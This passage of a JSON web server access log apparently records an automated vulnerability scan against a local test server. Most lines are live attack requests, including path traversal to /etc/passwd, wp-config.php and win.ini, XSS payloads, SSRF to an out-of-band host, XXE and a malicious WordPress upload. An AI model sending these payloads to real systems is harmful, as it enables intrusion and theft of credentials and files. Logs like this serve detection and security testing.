(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /\x5Cu001B]8;;https://example.com\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://ca2tuc8smpv1g2s80ca04rkisus1i7dkx.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22supported_type\x22\x0D\x0A\x0D\x0Atxt%\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A5242880\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229N5EgyKWk4IWilz3utJHGaCS8P.txt%\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0ACVE-2020-12800-29N5EgyKWk4IWilz3utJHGaCS8P\x0D\x0A-----------------------------350278735926454076983690555601--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29N5EgyKWk4IWilz3utJHGaCS8P.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"@\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.020","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/convert?xml=<%3fxml+version%3d\x221.0\x22+%3f>%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel 